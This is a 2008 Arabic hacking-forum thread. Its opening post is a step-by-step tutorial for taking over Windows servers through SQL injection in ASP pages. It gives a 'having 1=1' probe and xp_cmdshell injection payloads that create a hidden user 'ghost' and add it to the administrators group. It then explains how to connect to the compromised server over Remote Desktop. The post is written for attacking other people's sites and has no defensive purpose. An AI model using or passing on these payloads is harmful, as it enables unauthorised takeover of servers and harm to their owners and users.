![]() |
![]() |
![]() |
|
|
|
|
|||||||
|
|
|
|
| أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز |
![]() |
|
|
LinkBack | أدوات الموضوع |
|
|
رقم المشاركة : 1 (permalink) | |
|
|
بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته (وما أتيتم من العلم الا قليلا) والله ما ادري هل مكان الموضوع هنا او لا وارجو ان تعذرنوي اذا اخطيت بوضع الموضوع بغير محله عموما ولا اكثر هرج m31: نخش في المفيد ![]() توكلنا على الله,,, موضوع اليوم يتكلم عن كيفية سحب الـ root لسيرفرات الويندوز ! والاتصال به بالديسك توب عن طريق ثغرات الـ SQL ،، بمجرد وجود ثغره حقن بملف Asp على سيرفر ويندوز والدالة exec تكون مفعلة بالسيرفر ! تقدر من خلال الثغره تضيف يوز على السيرفر وتضيفه لمجموعة الادمن وتتصل بالسيرفر كامل عن طريق الريموت ديسك توب ،، اول شئ لـ اكتشاف ثغرات الـ SQL بملفات الـ Asp تقدر تضيف كود:
having 1=1 والسيرفر اللي عليه الموقع ويندوز ابشر بسحب الـ root ! اللحين كيف تضيف يوز على السيرفر من خلال الثغره بهذا الكود كود:
;exec master..xp_cmdshell 'net user ghost ghost /add' ;-- ![]() اللحين تم اضافة يوز على السيرفر بالبيانات التالية User : ghost Pass : ghost اللحين نضيف اليوز اللي اضافنه الى مجموعة الادمن بالسيرفر ،، من خلال هذا الكود ![]() كود:
;exec master..xp_cmdshell 'net localgroup administartor ghost /add' ;-- اللحين تروح تتصل بالسيرفر بالريموت ديسك توب ابدأء > البرامج المحلقة > اتصالات > الاتصال بسطح المكتب البعيد ! وتضع اليوز والباسورد اللي اضفته من خلال ثغره الحقن ،، ![]() بالخانة ( 1 ) تضع رقم ip السيرفر اللي اضفت له اليوز ،، بالخانة ( 2 ) تضع اسم اليوز اللي اضفته اللي قلنا انه ghost ،، بالخانة ( 3 ) تضع باسورد اليوز اللي اضفته اللي قلنا انه كمآن ghost ،، وتكبس على اتصال ومبروك عليك ! ![]() ويالله عيش حياتك آخر تعديل XP يوم 10-26-2008 في 06:06 PM.
|
|
|
|
رقم المشاركة : 6 (permalink) | |||
|
|
|
|||
|
|
رقم المشاركة : 9 (permalink) | ||
|
|
. اقتباس:
آسف على الإزعآج مشكور .. |
||
![]() |
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
| أدوات الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injectio | Dra Alsunna | [ Videos] | 4 | 11-30-2009 01:28 PM |
|
روابط مهمة |
أقسام المنتدى |
||||
|
|
|
|
|
|